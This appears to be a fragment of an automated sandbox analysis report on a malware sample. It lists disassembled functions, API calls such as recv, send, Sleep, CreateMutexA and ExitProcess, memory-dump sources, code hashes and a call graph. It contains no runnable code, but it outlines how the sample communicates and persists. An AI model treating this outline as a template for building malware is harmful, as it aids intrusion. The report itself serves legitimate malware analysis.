                                                                                                      • Opcode ID: 3f62f871ca032a2b776c2e51ea69a2b5f7d811b183494404879084f74af6f5e6
                                                                                                      • Instruction ID: 08e25b359a899e1dabdbeae798dd5e2ca483680eabf36843a93fe6be9b32bdda
                                                                                                      • Opcode Fuzzy Hash: 3f62f871ca032a2b776c2e51ea69a2b5f7d811b183494404879084f74af6f5e6
                                                                                                      • Instruction Fuzzy Hash: C511DAFF25C1207D7142D5827F68AFB67AEE5D2630330C53BF803D1946E2991A4EA232
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      APIs
                                                                                                      • recv.WS2_32(?,?,00000004,00000000), ref: 00E1D91B
                                                                                                      • recv.WS2_32(?,?,00000008,00000000), ref: 00E1D950
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: recv
                                                                                                      • String ID:
                                                                                                      • API String ID: 1507349165-0
                                                                                                      • Opcode ID: 42e2d7f4068e20f35dcf92acbb99dcb0547a91665577c61052631198dd45c0cb
                                                                                                      • Instruction ID: 7bc73417c052d7a9a43f600863202394eea622a6ae9d58d6219b51500d2fd906
                                                                                                      • Opcode Fuzzy Hash: 42e2d7f4068e20f35dcf92acbb99dcb0547a91665577c61052631198dd45c0cb
                                                                                                      • Instruction Fuzzy Hash: A731F8719442185FD720CB6DDC89FEF77BCEB08728F041625E519F7291DA749889CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,00E2E5E2,?,00000003,00000003,?,00E2E617,?,?,?,00000003,00000003,?,00E2DB8D,00E12EB9,00000001), ref: 00E2E293
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Time$FilePreciseSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1802150274-0
                                                                                                      • Opcode ID: c18d69006552fd5ec4ea8cbc7aeba8b14431fdff5b3b3a2cc243ddd017296d75
                                                                                                      • Instruction ID: 25e1a4fc01e7d635ba82755a0177a51bed445563aedb4e128b6045287ae03b90
                                                                                                      • Opcode Fuzzy Hash: c18d69006552fd5ec4ea8cbc7aeba8b14431fdff5b3b3a2cc243ddd017296d75
                                                                                                      • Instruction Fuzzy Hash: B4D02233A020389B89112B86BC048EDBF0CAB02BA03042425ED0A73330CA506C80DBE8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6a4cb69b6692df4e6e23bcc13dc614047a316c678c0d0dd0fd927dffd8b49c33
                                                                                                      • Instruction ID: c77e4901486cecb3436b4ed0cf046766c811270e8536e7cd95b61c65fe982c7e
                                                                                                      • Opcode Fuzzy Hash: 6a4cb69b6692df4e6e23bcc13dc614047a316c678c0d0dd0fd927dffd8b49c33
                                                                                                      • Instruction Fuzzy Hash: EB51F173E001158FCB14CF28CC81B9CBBA2EF86314F198568E854EB39ACA75E955C7A0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                      • Instruction ID: 452b86da64c535ec2488a8f4def8ca24471915a2cbec9ce2571354ba70f49cf9
                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                      • Instruction Fuzzy Hash: F8115E7F20114143DA44867DC4B66B7A395FBC532BF2CAB7AD842AB774D123D94C9602
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                      • Instruction ID: af1be176300ea4b5a56748a22738928bbe3ab3a171e425ea65370f45e2577ac1
                                                                                                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                      • Instruction Fuzzy Hash: E9E08C32915268EBCB18DB89D90498AF3ECEB88B14B210496F601E3200C370DE00C7D0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                      • String ID:
                                                                                                      • API String ID: 57040152-0
                                                                                                      • Opcode ID: b3cddbf0ba175d3d04b9836b9a927e4457c348a92cfdd1885cb7ba2c213ba6dc
                                                                                                      • Instruction ID: c955ce58a698269f77cd7129a5e627de0b5f42403e8b02c2b6aa6a510a1e9ac8
                                                                                                      • Opcode Fuzzy Hash: b3cddbf0ba175d3d04b9836b9a927e4457c348a92cfdd1885cb7ba2c213ba6dc
                                                                                                      • Instruction Fuzzy Hash: 2CA1EDB0A042159FDB25DB64DC44B9AB7F8EF18318F009629EA15F7281EB34EA54CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _wcsrchr
                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                      • API String ID: 1752292252-4019086052
                                                                                                      • Opcode ID: ff09a3c26120e3593510d0c6089c4769b383bc0e6481d93f849887581aa52d32
                                                                                                      • Instruction ID: 61c1f88b5c9e20bd66e7eb844e7c01129fcd92e4ebb8ece3ec02d5bba3af4730
                                                                                                      • Opcode Fuzzy Hash: ff09a3c26120e3593510d0c6089c4769b383bc0e6481d93f849887581aa52d32
                                                                                                      • Instruction Fuzzy Hash: FF014977A447212576192019BE0263F17C89FD6BF8B6A203FFC54FB2C2EE95DC024194
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                      • String ID:
                                                                                                      • API String ID: 531285432-0
                                                                                                      • Opcode ID: b0a3aebec89ec19e0738b2e3af70c1f18c6fa7c9d61a0ce80f37002296e8b89a
                                                                                                      • Instruction ID: ac6f713096bda855325820ce8b6e1f6d8f51ddf716a750ae9c022e1f5c76971d
                                                                                                      • Opcode Fuzzy Hash: b0a3aebec89ec19e0738b2e3af70c1f18c6fa7c9d61a0ce80f37002296e8b89a
                                                                                                      • Instruction Fuzzy Hash: C0212F71A002299FDF04EF94EC829BEB7B8FF48714F105059F601B7261DB709D458BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ___free_lconv_mon
                                                                                                      • String ID: 8B$`G
                                                                                                      • API String ID: 3903695350-3211121227
                                                                                                      • Opcode ID: ab6a5de541c358f13fed26671e5804ac2f411c85236c76f8e8a066e0d12c45af
                                                                                                      • Instruction ID: 2d4c6cefcf0ae9d5d61be8dc5c9921eb8f295830277237b370f37172b51267be
                                                                                                      • Opcode Fuzzy Hash: ab6a5de541c358f13fed26671e5804ac2f411c85236c76f8e8a066e0d12c45af
                                                                                                      • Instruction Fuzzy Hash: B03152316007059FEB60AE38D949BA673E8AF40355F24A829F899F7192DF71FD44C710
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:0.8%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:687
                                                                                                      Total number of Limit Nodes:4
10757->10759 10758->10731 10759->10758 10761 89e441 10760->10761 10762 89e4a6 10761->10762 10763 89e4cb GetPEB ExitProcess GetPEB 10761->10763 10762->10731 10763->10762 10764 862a90 10765 862ace 10764->10765 10768 87ce8b 10765->10768 10767 862adb shared_ptr std::invalid_argument::invalid_argument 10769 87ce97 10768->10769 10770 87cea7 10768->10770 10769->10770 10772 87e108 10769->10772 10770->10767 10773 87e11d TpReleaseWork 10772->10773 10773->10770 10851 86d8d0 10852 86d911 recv 10851->10852 10853 86d932 recv 10852->10853 10855 86d967 recv 10853->10855 10857 86d9a1 10855->10857 11177 862a10 11178 862a1c 11177->11178 11179 862a1a 11177->11179 11180 87d8fa 4 API calls 11178->11180 11181 862a22 11180->11181 11199 868450 11201 8685ba 11199->11201 11202 8684a8 shared_ptr 11199->11202 11200 865d40 3 API calls 11200->11202 11202->11200 11202->11201 10774 863e9f 10775 863eb6 10774->10775 10776 863ead 10774->10776 10778 862310 10776->10778 10779 862324 10778->10779 10782 87cbbd 10779->10782 10790 89517a 10782->10790 10784 86232a 10784->10775 10785 87cc35 ___std_exception_copy 10797 87c83d 10785->10797 10787 87cc28 10793 87c5e6 10787->10793 10801 8965b9 10790->10801 10792 87cbe5 10792->10784 10792->10785 10792->10787 10794 87c62f ___std_exception_copy 10793->10794 10795 87c642 shared_ptr 10794->10795 10807 87ca2f 10794->10807 10795->10784 10798 87c868 10797->10798 10800 87c871 shared_ptr 10797->10800 10799 87ca2f 4 API calls 10798->10799 10799->10800 10800->10784 10802 8965be __cftof 10801->10802 10802->10792 10803 89ec54 __cftof 3 API calls 10802->10803 10806 89a21f __cftof 10802->10806 10803->10806 10804 897c7d __cftof 3 API calls 10805 89a252 10804->10805 10806->10804 10818 87d56f 10807->10818 10810 87ca78 10810->10795 10812 87caae 10813 87d56f InitOnceExecuteOnce 10812->10813 10814 87caf1 10813->10814 10815 87caf8 10814->10815 10816 89834b 3 API calls 10814->10816 10815->10795 10817 87cb2e 10816->10817 10817->10795 10830 87e2c1 10818->10830 10821 89834b 10822 898357 
__dosmaperr 10821->10822 10823 89bc91 __cftof 3 API calls 10822->10823 10828 89835c 10823->10828 10824 89a20f __cftof 3 API calls 10825 898386 10824->10825 10826 898395 10825->10826 10834 89801d 10825->10834 10826->10812 10828->10824 10829 8983bd ___free_lconv_mon 10829->10812 10831 87e2cf InitOnceExecuteOnce 10830->10831 10833 87ca71 10830->10833 10831->10833 10833->10810 10833->10821 10835 897f9a __cftof 3 API calls 10834->10835 10836 89802f 10835->10836 10836->10829 11307 86d5df 11309 86d5e3 __cftof __dosmaperr 11307->11309 11308 86d879 shared_ptr std::invalid_argument::invalid_argument 11309->11308 11310 87dd3c GetSystemTimePreciseAsFileTime 11309->11310 11311 86d6e2 11310->11311 11311->11308 11312 87d8fa 4 API calls 11311->11312 11313 86d8ad 11312->11313 11314 87d8fa 4 API calls 11313->11314 11315 86d8bd 11314->11315 11316 87d8fa 4 API calls 11315->11316 11317 86d8c3 11316->11317 11318 87d8fa 4 API calls 11317->11318 11319 86d8c9 11318->11319 10858 86d2dc 10859 86d2e9 shared_ptr 10858->10859 10860 86d352 shared_ptr std::invalid_argument::invalid_argument 10859->10860 10886 87dd3c 10859->10886 10863 86d4fb 10889 87d8fa 10863->10889 10864 86d41b 10865 86d434 send 10864->10865 10867 86d451 10864->10867 10865->10864 10865->10867 10868 86d470 send 10867->10868 10872 86d48d 10867->10872 10868->10867 10868->10872 10869 87d8fa 4 API calls 10875 86d507 __cftof 10869->10875 10870 86d4cf __Mtx_unlock 10870->10869 10873 86d4e8 std::invalid_argument::invalid_argument 10870->10873 10871 86d4b2 send 10871->10872 10872->10870 10872->10871 10874 86d879 shared_ptr std::invalid_argument::invalid_argument 10875->10874 10876 87dd3c GetSystemTimePreciseAsFileTime 10875->10876 10877 86d6e2 10876->10877 10877->10874 10878 87d8fa 4 API calls 10877->10878 10879 86d8ad 10878->10879 10880 87d8fa 4 API calls 10879->10880 10881 86d8bd 10880->10881 10882 87d8fa 4 API calls 10881->10882 10883 86d8c3 10882->10883 10884 87d8fa 4 API calls 10883->10884 10885 86d8c9 10884->10885 10893 87dae2 
10886->10893 10888 86d410 10888->10863 10888->10864 10890 87d922 10889->10890 10891 87d904 10889->10891 10890->10890 10891->10890 10910 87d927 10891->10910 10894 87db38 10893->10894 10896 87db0a std::invalid_argument::invalid_argument 10893->10896 10894->10896 10899 87e5fb 10894->10899 10896->10888 10897 87db8d __Xtime_diff_to_millis2 10897->10896 10898 87e5fb _xtime_get GetSystemTimePreciseAsFileTime 10897->10898 10898->10897 10900 87e60a 10899->10900 10902 87e617 __aulldvrm 10899->10902 10900->10902 10903 87e5d4 10900->10903 10902->10897 10906 87e27a 10903->10906 10907 87e297 10906->10907 10908 87e28b GetSystemTimePreciseAsFileTime 10906->10908 10907->10902 10908->10907 10913 8629e0 10910->10913 10912 87d93e std::_Throw_future_error 10914 87d56f InitOnceExecuteOnce 10913->10914 10916 8629f4 __dosmaperr 10914->10916 10915 8629ff 10915->10912 10916->10915 10917 89bc91 __cftof 3 API calls 10916->10917 10922 89835c 10917->10922 10918 89a20f __cftof 3 API calls 10919 898386 10918->10919 10920 898395 10919->10920 10921 89801d 3 API calls 10919->10921 10920->10912 10923 8983bd ___free_lconv_mon 10921->10923 10922->10918 10923->10912 11357 87e75c 11359 87e76c 11357->11359 11358 87e814 11359->11358 11360 87e810 RtlWakeAllConditionVariable 11359->11360 11203 86205a 11206 87dd8c 11203->11206 11205 862064 11207 87ddb4 11206->11207 11208 87dd9c 11206->11208 11207->11205 11208->11207 11210 87e64e 11208->11210 11211 87e365 __Mtx_init_in_situ InitializeCriticalSectionEx 11210->11211 11212 87e660 11211->11212 11212->11208 10924 8980d4 10925 8980ec 10924->10925 10926 8980e2 10924->10926 10927 89801d 3 API calls 10925->10927 10928 898106 ___free_lconv_mon 10927->10928 10524 86a326 10525 86a340 10524->10525 10527 86a362 shared_ptr 10524->10527 10526 86a423 Sleep CreateMutexA 10525->10526 10525->10527 10528 86a45e 10526->10528 10837 8660a6 10839 8660ba shared_ptr 10837->10839 10838 86613e shared_ptr std::invalid_argument::invalid_argument 10839->10838 10840 865d40 3 API calls 
10839->10840 10841 866231 10840->10841 10842 8621c0 3 API calls 10841->10842 10843 866249 shared_ptr 10842->10843 10844 865d40 3 API calls 10843->10844 10850 8663d2 shared_ptr std::invalid_argument::invalid_argument 10843->10850 10845 8662bd 10844->10845 10846 8621c0 3 API calls 10845->10846 10848 8662d7 shared_ptr 10846->10848 10847 865d40 3 API calls 10847->10848 10848->10847 10849 8621c0 3 API calls 10848->10849 10848->10850 10849->10848 11263 87e7a6 11265 87e7b7 11263->11265 11264 87e7bf 11265->11264 11267 87e82e 11265->11267 11268 87e83c SleepConditionVariableCS 11267->11268 11270 87e855 11267->11270 11268->11270 11270->11265 10929 863ee0 10930 863f22 10929->10930 10931 863fd2 10930->10931 10932 863f8c 10930->10932 10935 863f35 std::invalid_argument::invalid_argument 10930->10935 10942 863de0 10931->10942 10936 8634e0 10932->10936 10937 863516 10936->10937 10941 86354e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10937->10941 10948 862be0 10937->10948 10939 86359e 10939->10941 10957 862b00 10939->10957 10941->10935 10943 863e48 10942->10943 10945 863e1e 10942->10945 10944 863e58 10943->10944 10946 862b00 3 API calls 10943->10946 10944->10935 10945->10935 10947 863e7f 10946->10947 10947->10935 10949 862c1d 10948->10949 10950 87d56f InitOnceExecuteOnce 10949->10950 10951 862c46 10950->10951 10952 862c51 std::invalid_argument::invalid_argument 10951->10952 10953 862c88 10951->10953 10964 87d587 10951->10964 10952->10939 10971 862340 10953->10971 10958 862b0e 10957->10958 10985 87ced7 10958->10985 10960 862b42 10961 862b49 10960->10961 10991 862b80 10960->10991 10961->10941 10963 862b58 std::_Throw_future_error 10965 87d593 std::_Throw_future_error 10964->10965 10966 87d603 10965->10966 10967 87d5fa 10965->10967 10969 8629e0 4 API calls 10966->10969 10974 87d50f 10967->10974 10970 87d5ff 10969->10970 10970->10953 10980 87cc66 10971->10980 10973 862372 10975 87e2c1 InitOnceExecuteOnce 10974->10975 10976 87d527 10975->10976 
10977 87d52e 10976->10977 10978 89834b 3 API calls 10976->10978 10977->10970 10979 87d537 10978->10979 10979->10970 10981 87cc81 std::_Throw_future_error 10980->10981 10982 89a20f __cftof 3 API calls 10981->10982 10984 87cce8 __cftof std::invalid_argument::invalid_argument 10981->10984 10983 87cd2f 10982->10983 10984->10973 10986 87cee4 10985->10986 10990 87cf03 Concurrency::details::_Reschedule_chore 10985->10990 10994 87e207 10986->10994 10988 87cef4 10988->10990 10996 87ceae 10988->10996 10990->10960 10992 87ce8b TpReleaseWork 10991->10992 10993 862bb2 shared_ptr 10992->10993 10993->10963 10995 87e222 CreateThreadpoolWork 10994->10995 10995->10988 10997 87ceb7 Concurrency::details::_Reschedule_chore 10996->10997 11000 87e45c 10997->11000 10999 87ced1 10999->10990 11001 87e471 TpPostWork 11000->11001 11001->10999 11192 864020 11193 86406a 11192->11193 11194 8640b2 std::invalid_argument::invalid_argument 11193->11194 11195 863de0 3 API calls 11193->11195 11195->11194 11271 861fa0 11272 87dd1b __Mtx_init_in_situ 2 API calls 11271->11272 11273 861fac 11272->11273 11002 86d6ee 11003 86d72c __Mtx_unlock 11002->11003 11004 86d8b7 11003->11004 11005 86d76d 11003->11005 11007 87d8fa 4 API calls 11004->11007 11020 86d3f0 11005->11020 11008 86d7ed 11007->11008 11010 87d8fa 4 API calls 11008->11010 11012 86d7f8 shared_ptr __Mtx_unlock 11008->11012 11009 86d7e0 11011 87dd3c GetSystemTimePreciseAsFileTime 11009->11011 11010->11012 11011->11008 11013 87d8fa 4 API calls 11012->11013 11019 86d879 shared_ptr std::invalid_argument::invalid_argument 11012->11019 11016 86d8c9 11013->11016 11014 86d77f 11014->11009 11015 86d7ce 11014->11015 11018 86d3f0 8 API calls 11014->11018 11017 86d3f0 8 API calls 11015->11017 11017->11009 11018->11014 11021 87dd3c GetSystemTimePreciseAsFileTime 11020->11021 11022 86d410 11021->11022 11023 86d4fb 11022->11023 11024 86d41b 11022->11024 11026 87d8fa 4 API calls 11023->11026 11025 86d434 send 11024->11025 11027 86d451 11024->11027 11025->11024 
11025->11027 11030 86d4cf __Mtx_unlock 11026->11030 11028 86d470 send 11027->11028 11032 86d48d 11027->11032 11028->11027 11028->11032 11029 87d8fa 4 API calls 11035 86d507 __cftof 11029->11035 11030->11029 11033 86d4e8 std::invalid_argument::invalid_argument 11030->11033 11031 86d4b2 send 11031->11032 11032->11030 11032->11031 11033->11014 11034 86d879 shared_ptr std::invalid_argument::invalid_argument 11034->11014 11035->11034 11036 87dd3c GetSystemTimePreciseAsFileTime 11035->11036 11037 86d6e2 11036->11037 11037->11034 11038 87d8fa 4 API calls 11037->11038 11039 86d8ad 11038->11039 11040 87d8fa 4 API calls 11039->11040 11041 86d8bd 11040->11041 11042 87d8fa 4 API calls 11041->11042 11043 86d8c3 11042->11043 11044 87d8fa 4 API calls 11043->11044 11045 86d8c9 11044->11045 11320 89a1e1 11321 899e37 3 API calls 11320->11321 11322 89a1ff 11321->11322 11046 86daeb 11047 87dd3c GetSystemTimePreciseAsFileTime 11046->11047 11050 86dafe __Mtx_unlock 11047->11050 11048 86db62 11049 87d8fa 4 API calls 11048->11049 11051 86db68 11049->11051 11050->11048 11052 87d8fa 4 API calls 11050->11052 11053 86dac3 std::invalid_argument::invalid_argument 11050->11053 11052->11048 11327 86c929 11329 86c960 11327->11329 11338 86c942 shared_ptr 11327->11338 11328 86cd5a shared_ptr std::invalid_argument::invalid_argument 11330 865d40 3 API calls 11329->11330 11329->11338 11331 86c9db 11330->11331 11333 86c290 3 API calls 11331->11333 11332 865d40 3 API calls 11334 86cdf5 11332->11334 11333->11338 11335 865d40 3 API calls 11334->11335 11336 86ce27 11335->11336 11337 865d40 3 API calls 11336->11337 11339 86ce43 shared_ptr 11337->11339 11338->11328 11338->11332 10508 897cb9 10511 897b57 10508->10511 10513 897b65 __cftof 10511->10513 10512 897bb0 10513->10512 10516 897bbb 10513->10516 10515 897bba 10522 89b922 GetPEB 10516->10522 10518 897bc5 10519 897bda __cftof 10518->10519 10520 897bca GetPEB 10518->10520 10521 897bf2 ExitProcess 10519->10521 10520->10519 10523 89b93c __cftof 10522->10523 
10523->10518 11361 864176 11362 862310 4 API calls 11361->11362 11363 86417f 11362->11363 11218 862070 11219 87dd8c InitializeCriticalSectionEx 11218->11219 11220 86207a 11219->11220 11221 866a70 11222 866aa2 11221->11222 11231 897cf0 11222->11231 11227 897ccf 3 API calls 11228 866abf 11227->11228 11229 897ccf 3 API calls 11228->11229 11230 866ad7 11229->11230 11232 89bc91 __cftof 3 API calls 11231->11232 11233 866aa8 11232->11233 11234 897ccf 11233->11234 11235 89bc91 __cftof 3 API calls 11234->11235 11236 866ab0 11235->11236 11236->11227 11274 8641b0 11277 8639c0 11274->11277 11276 8641bb shared_ptr 11278 8639f9 11277->11278 11279 863a39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11278->11279 11282 863b38 11278->11282 11287 8631d0 11278->11287 11279->11276 11280 8631d0 5 API calls 11284 863b5f 11280->11284 11282->11280 11282->11284 11283 863b68 11283->11276 11284->11283 11285 863710 3 API calls 11284->11285 11286 863bdb 11285->11286 11288 87dd3c GetSystemTimePreciseAsFileTime 11287->11288 11291 863214 11288->11291 11289 87d8fa 4 API calls 11290 86323c __Mtx_unlock 11289->11290 11292 87d8fa 4 API calls 11290->11292 11294 863250 std::invalid_argument::invalid_argument 11290->11294 11291->11289 11291->11290 11293 863277 11292->11293 11295 87dd3c GetSystemTimePreciseAsFileTime 11293->11295 11294->11282 11296 8632af 11295->11296 11297 87d8fa 4 API calls 11296->11297 11298 8632b6 11296->11298 11297->11298 11299 87d8fa 4 API calls 11298->11299 11300 8632d7 __Mtx_unlock 11298->11300 11299->11300 11301 87d8fa 4 API calls 11300->11301 11302 8632eb 11300->11302 11303 86330e 11301->11303 11302->11282 11303->11282

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 304 897bbb-897bc8 call 89b922 307 897bea-897bfc call 897bfd ExitProcess 304->307 308 897bca-897bd8 GetPEB 304->308 308->307 310 897bda-897be9 308->310 310->307
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,?,00897BBA,?,?,?,?,?,00898C0E), ref: 00897BF7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 86b491709a31fd81043bfd9ec24a56c6dc5116f9a9495d179df47978bf2713aa
                                                                                                      • Instruction ID: 26acf4514911af94d1ad1e90d69b1c5e202cc5d7e2ebbd99058d06738ea8b788
                                                                                                      • Opcode Fuzzy Hash: 86b491709a31fd81043bfd9ec24a56c6dc5116f9a9495d179df47978bf2713aa
                                                                                                      • Instruction Fuzzy Hash: 89E08C30068208AFCF267B18D829EA83B9DFF51364F081810F9048A222DB35FD51C590
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 869675-869695 4 869697-8696a3 0->4 5 8696c3-8696df 0->5 6 8696a5-8696b3 4->6 7 8696b9-8696c0 call 87ecf8 4->7 8 8696e1-8696ed 5->8 9 86970d-86972c 5->9 6->7 14 86a3ec 6->14 7->5 10 869703-86970a call 87ecf8 8->10 11 8696ef-8696fd 8->11 12 86972e-86973a 9->12 13 86975a-86a3e6 call 879750 9->13 10->9 11->10 11->14 17 869750-869757 call 87ecf8 12->17 18 86973c-86974a 12->18 20 86a423-86a466 Sleep CreateMutexA 14->20 21 86a3ec call 8982fa 14->21 17->13 18->14 18->17 21->20
                                                                                                      APIs
